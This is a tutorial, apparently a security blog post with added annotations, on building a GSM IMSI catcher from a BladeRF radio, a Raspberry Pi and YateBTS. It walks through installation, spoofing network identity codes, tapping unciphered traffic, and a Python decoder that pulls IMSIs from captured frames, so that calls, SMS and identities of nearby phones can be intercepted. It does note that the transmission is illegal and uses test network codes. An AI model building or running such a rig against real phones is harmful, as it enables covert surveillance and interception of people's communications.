GSM, the Global System for Mobile Communications, is a world-wide standard for digital cellular telephony. It is published by the European Telecommunications Standards Institute (ETSI) and is widely deployed in Europe, Asia and, increasingly, the Americas. A GSM network is divided into three major subsystems: the Network Switching Subsystem (NSS), the Base Station Subsystem (BSS) and the Operation and Support Subsystem (OSS).
GSM is by now a well-understood broken protocol; researchers such as Tobias Engel and Philippe Langlois have been finding and exploiting weaknesses in it for years. A particularly easy attack vector remains the air interface (Um), because of its weak authentication: GSM authentication is one-way, the Mobile Station (MS) proves its identity to the network, but the network never proves its identity to the MS. An attacker can therefore stand up a rogue Base Transceiver Station (BTS) next to an authentic one, and phones in range will attach to it. In this document we will look at building a working fake BTS from cheap hardware available online.
Before we proceed, let us look at the set of identifiers GSM uses to perform mobility management for a subscriber and to address the other network elements. The important addresses and identifiers used in GSM are:
- International Mobile Station Equipment Identity (IMEI)
- International Mobile Subscriber Identity (IMSI)
- Mobile Subscriber ISDN Number (MSISDN)
- Mobile Station Roaming Number (MSRN)
- Location Area Identity (LAI)
- Temporary Mobile Subscriber Identity (TMSI)
- Cell Identifier (CI)
Readers are advised to read the linked articles and understand, in basic terms, what these identifiers represent.
Now let us look at the second of these, the Base Station Subsystem (BSS). The BSS handles the traffic and signalling between a mobile phone and the Network Switching Subsystem. It also performs transcoding of speech channels, allocation of radio channels to mobile phones, paging, transmission and reception over the air interface and many other tasks related to the radio network.
The BSS consists of two parts:
- The Base Transceiver Station (BTS)
- The Base Station Controller (BSC)
The BTS is responsible for sending and receiving radio signals. A typical BTS consists of components such as a transceiver, a power amplifier, an antenna and a baseband receiver unit. Each BTS deployed in the field acts as a single cell.
Recent research and the availability of cheap Software Defined Radio (SDR) hardware and open-source GSM protocol stacks make it fairly easy to build a fake BTS. Note that transmitting on licensed cellular spectrum without authorisation is illegal in many countries, though that has not deterred many people from building one. Such an unauthorised BTS is called a fake BTS or an IMSI catcher, after the subscriber identity it harvests. Such devices have long been used by law enforcement and intelligence agencies for surveillance.
Now let us look at what one needs to build an IMSI catcher or fake BTS.
The hardware and software required to build the BTS are:
- Any Full-Duplex SDR – We will be using BladeRF x40 from Nuand
- Two Quad-band Cellular Duck Antennas SMA
- A Raspberry Pi 3
- A microSD card for the Pi, 8 GB or larger
- Any BTS Software – We would be using YateBTS.
- Linux Image for Rpi – We would be using Raspbian
- Firmware & FPGA image for BladeRF
Prepping and Configuring the Pi
To begin with, write the Raspbian image onto the microSD card.
- Insert the microSD card into the laptop using a suitable adapter and identify its block device (for example with lsblk); make sure none of its partitions are mounted.
- Then use the dd command to write the image to the card:
dd if=<path to image file> of=/dev/mmcblk0 bs=1M
NOTE: /dev/mmcblk0 is the block device of the card itself (not a partition such as /dev/mmcblk0p1); on other machines it may appear as /dev/sdX instead. dd overwrites whatever device you name without asking, so double-check it before running the command. The block size (bs) can also be set to 512 bytes, it just takes longer.
Once installed, we shall now begin configuring the Raspberry Pi.
1. Insert the microSD into the Pi and boot it up. Set up either a Wi-Fi or an Ethernet interface on the Pi, since we will be using that interface to talk to the Pi later.
Pro Tip! – Connect the Pi to a router or an existing network with DHCP enabled. The Pi then gets an IP address that you can discover with a utility such as netdiscover or a scanner such as Nmap.
2. Once the interface is up, SSH into the Pi using the default username “pi” (the default password is “raspberry”). Change that password straight away; a BTS box with default credentials on a shared network is an easy target itself.
3. Next, install the dependencies, namely apache (the apache2 package), bladerf, libbladerf-dev, php5 and the packages they pull in, as shown below:
4. Now start the bladeRF-cli utility and type version at its prompt. The output lists the library, firmware and FPGA versions, and the firmware and FPGA images you download must match it: install only the versions the output calls for.
Yate and YateBTS:
The next pieces of software we install are the most essential components of the setup. Yate is the telephony engine and YateBTS is the GSM/GPRS stack that drives the SDR; together, in Network-in-a-Box (NIB) mode, they give us a complete, self-contained mobile network running on the Pi. How cool is that!
1. The first step is to download the Yate and YateBTS sources, like so:
2. Build Yate first and then YateBTS, using the commands shown below:
3. Once both are installed, create a symbolic link to the NIB web UI from the web server's document root, as shown:
4. And grant the web server write permission on the YateBTS configuration files so that the UI can edit them. (Keep in mind that this makes the BTS configuration editable by anyone who can reach the web server, so do not expose it beyond the lab network.)
With these steps completed, we should be able to open the BTS web UI in a browser.
Configuring the Network.
Almost there, so let’s get down to it.
1. The first thing we need to do is give our fake network an identity. Navigate to BTS Configuration > GSM subsection.
2. Enter the Mobile Country Code (MCC) and Mobile Network Code (MNC), and configure the radio band and channel (ARFCN) to use, as shown below. You can look up the MCC and MNC values for your country and for each operator online, just search for “MCC MNC”. Phones only attach to a PLMN they know, so the MCC/MNC pair decides which subscribers will latch on: announcing a real operator's codes on a real band is exactly what makes running this equipment outside a shielded lab illegal, whereas the test PLMN 001-01 is reserved for this kind of testing.
3. The last identification parameter is the Country Code of the country the network is in. For example, for India the CC is +91.
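The same settings as they end up in the configuration files the NIB web UI edits, added here as an example rather than taken from the original post. The section and key names follow YateBTS's ybts.conf and subscribers.conf as recalled from the project; check them against the copies your build installed. The values are assumptions for the test PLMN 001-01, not the settings of any operator:

```ini
; /usr/local/etc/yate/ybts.conf (path assumed for a default YateBTS install)
[gsm]
Radio.Band=900                ; band the BladeRF transmits in: 850, 900, 1800 or 1900
Radio.C0=1000                 ; ARFCN of the beacon carrier; pick one that is unused where you are
Identity.MCC=001              ; test PLMN 001-01; a real operator's MCC/MNC is what makes phones camp on it
Identity.MNC=01
Identity.ShortName=TestBTS    ; network name the phone displays
Identity.LAC=1000             ; a LAI the phone has not seen forces a Location Update,
Identity.CI=10                ; during which the network may ask for the IMSI

[tapping]
GSM=yes                       ; mirror every GSM frame the BTS handles to the loopback interface
GPRS=yes                      ; same for GPRS
TargetIP=127.0.0.1

; /usr/local/etc/yate/subscribers.conf
[general]
country_code=91               ; dialling prefix of the country the BTS is in (India in the post)
regexp=^001                   ; only IMSIs of the test PLMN may register; .* would accept every phone that tries
```

The regexp line is the one to treat with care: it is the only thing deciding which subscribers the box will accept, and the web UI defaults make it easy to accept everyone.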
On to the fun part: the TAPPING panel in the web GUI lets us mirror every GSM and GPRS frame the BTS handles onto the loopback interface, like so:
The good news is that since our very “authentic-looking” fake network runs with no ciphering at all, all we need to do is capture the traffic on the loopback interface (with tcpdump, then open the capture in Wireshark, which decodes the tapped frames as GSMTAP) to extract identities, call and SMS information from the GSM and GPRS packets.
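What the tapped frames actually contain, as an added example that is not part of the original post: YateBTS mirrors frames as GSMTAP datagrams (UDP, registered port 4729). The script below parses the GSMTAP header and the LAPDm frame inside it and decodes the Mobile Identity carried in an MM Identity Response, which is where a phone hands its IMSI to the network in clear. The exchange it decodes is constructed by sample_exchange() on the test PLMN 001-01 rather than captured from a real phone, and the ARFCN, signal values and frame numbers in it are assumptions.

```python
"""Decode GSMTAP datagrams tapped from a BTS and pull out the mobile identities
exchanged in MM Identity Request / Identity Response messages (3GPP TS 24.008)."""
import struct

GSMTAP_VERSION = 2
GSMTAP_TYPE_UM = 1              # Um air-interface frame; the payload is an LAPDm frame
GSMTAP_ARFCN_F_UPLINK = 0x4000  # set in the ARFCN field for MS -> network frames
GSMTAP_CHANNEL_SDCCH8 = 0x08
GSMTAP_HDR = ">BBBBHbbIBBBB"    # version, hdr_len (32-bit words), type, timeslot, arfcn,
                                # signal dBm, SNR dB, frame number, sub-type, antenna, sub-slot, reserved
LAPDM_FRAME_LEN = 23            # SDCCH/SACCH frames are padded with 0x2B to 23 octets
PD_MM = 0x05                    # Mobility Management protocol discriminator
MM_IDENTITY_REQUEST = 0x18
MM_IDENTITY_RESPONSE = 0x19
ID_TYPE_NAMES = {1: "IMSI", 2: "IMEI", 3: "IMEISV", 4: "TMSI"}


def encode_mobile_identity(id_type, digits):
    """Pack a digit string as a Mobile Identity IE value (IMSI/IMEI/IMEISV).
    Octet 1 holds digit 1 in the high nibble, the odd/even flag in bit 4 and the
    identity type in bits 1-3; later octets hold two digits each, low nibble first."""
    odd = len(digits) % 2
    out = bytearray([(int(digits[0]) << 4) | (odd << 3) | id_type])
    rest = digits[1:] + ("" if odd else "F")   # even count: filler 1111 in the last high nibble
    for lo, hi in zip(rest[0::2], rest[1::2]):
        out.append((int(hi, 16) << 4) | int(lo, 16))
    return bytes(out)


def decode_mobile_identity(ie):
    """Inverse of encode_mobile_identity; a TMSI is 4 raw octets and is returned as hex."""
    id_type = ie[0] & 0x07
    if id_type == 4:
        return "TMSI", ie[1:5].hex()
    odd = (ie[0] >> 3) & 1
    nibbles = [ie[0] >> 4]
    for octet in ie[1:]:
        nibbles += [octet & 0x0F, octet >> 4]
    if not odd:
        nibbles.pop()                          # drop the 0xF filler
    return ID_TYPE_NAMES.get(id_type, "unknown"), "".join(str(n) for n in nibbles)


def build_lapdm(l3, from_ms):
    """Wrap an L3 message in a minimal LAPDm I frame (SAPI 0) as carried on an SDCCH."""
    address = 0x01 if from_ms else 0x03        # EA=1, C/R=1 for network commands, SAPI=0
    control = 0x00                             # I frame, N(S)=0, N(R)=0
    length = (len(l3) << 2) | 0x01             # length indicator, M=0, EL=1
    frame = bytes([address, control, length]) + l3
    return frame + b"\x2b" * (LAPDM_FRAME_LEN - len(frame))


def build_gsmtap(lapdm, uplink, frame_number, arfcn=1000):
    """Prepend a GSMTAP v2 header; ARFCN, signal and SNR values here are assumptions."""
    arfcn_field = arfcn | (GSMTAP_ARFCN_F_UPLINK if uplink else 0)
    header = struct.pack(GSMTAP_HDR, GSMTAP_VERSION, 4, GSMTAP_TYPE_UM, 0, arfcn_field,
                         -60, 20, frame_number, GSMTAP_CHANNEL_SDCCH8, 0, 0, 0)
    return header + lapdm


def parse_gsmtap(datagram):
    """Return the header fields and the LAPDm payload, or None if not a GSMTAP v2 Um frame."""
    size = struct.calcsize(GSMTAP_HDR)
    if len(datagram) < size:
        return None
    version, hdr_words, typ, timeslot, arfcn, signal, snr, fn, sub_type, _, _, _ = \
        struct.unpack(GSMTAP_HDR, datagram[:size])
    if version != GSMTAP_VERSION or typ != GSMTAP_TYPE_UM:
        return None
    return {"uplink": bool(arfcn & GSMTAP_ARFCN_F_UPLINK), "arfcn": arfcn & 0x3FFF,
            "timeslot": timeslot, "fn": fn, "signal_dbm": signal, "snr_db": snr,
            "channel": sub_type, "payload": datagram[hdr_words * 4:]}


def identity_from_datagram(datagram):
    """Return ("request", type, None) or ("response", type, value) for MM identity messages."""
    pkt = parse_gsmtap(datagram)
    if pkt is None or len(pkt["payload"]) < 3:
        return None
    lapdm = pkt["payload"]
    l3 = lapdm[3:3 + (lapdm[2] >> 2)]          # strip the address/control/length octets
    if len(l3) < 3 or (l3[0] & 0x0F) != PD_MM:
        return None
    msg_type = l3[1] & 0x3F                    # bits 7-8 carry N(SD) on uplink MM messages
    if msg_type == MM_IDENTITY_REQUEST and not pkt["uplink"]:
        return "request", ID_TYPE_NAMES.get(l3[2] & 0x07, "unknown"), None
    if msg_type == MM_IDENTITY_RESPONSE and pkt["uplink"]:
        kind, value = decode_mobile_identity(l3[3:3 + l3[2]])
        return "response", kind, value
    return None


def sample_exchange(imsi="001010123456789"):
    """Constructed (not captured) request/response pair on the test PLMN 001-01."""
    request = build_lapdm(bytes([PD_MM, MM_IDENTITY_REQUEST, 0x01]), from_ms=False)  # 0x01: ask for IMSI
    ie = encode_mobile_identity(1, imsi)
    response = build_lapdm(bytes([PD_MM, MM_IDENTITY_RESPONSE, len(ie)]) + ie, from_ms=True)
    return [build_gsmtap(request, uplink=False, frame_number=100),
            build_gsmtap(response, uplink=True, frame_number=151)]


if __name__ == "__main__":
    for datagram in sample_exchange():
        print(identity_from_datagram(datagram))
```

Against a live box, bind a UDP socket on 127.0.0.1:4729 (or read the datagrams back out of a tcpdump capture of lo) and feed each datagram to identity_from_datagram(); the same parser recognises IMEI and IMEISV responses, and a TMSI reassignment shows up as a 4-octet identity rather than digits.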
Once all the configuration is complete, the only thing left to do is start the BTS. Log into the Pi and run the following command in the console:
sudo yate -s
If you see no error messages, voila! You have your own personal GSM network!
To be sure everything is in order, check that the LED on the BladeRF is blinking.
A BTS conceptually works just like a Wi-Fi access point. Just as someone can set up a rogue access point and sniff the Internet traffic of whoever joins it, a malicious actor can set up a GSM/GPRS network and perform a MITM attack. Once a cellphone latches on to the fake BTS, which it will do because the GSM protocol never authenticates the network to the phone, all of its communication, Internet traffic, calls and short messages (SMS), is in the attacker's hands. Here is what our final setup looks like:
In this document we have shown that it is possible to set up a fully functioning fake BTS that threat actors could use to perform MITM attacks on the Um interface of a GSM network, using nothing but off-the-shelf equipment. Total cost of the setup: under USD 500. A skilled attacker using open-source software can cause serious damage and compromise the confidentiality and integrity of a communication channel, attacking not only regular mobile stations but any other device that talks GSM over the Um interface.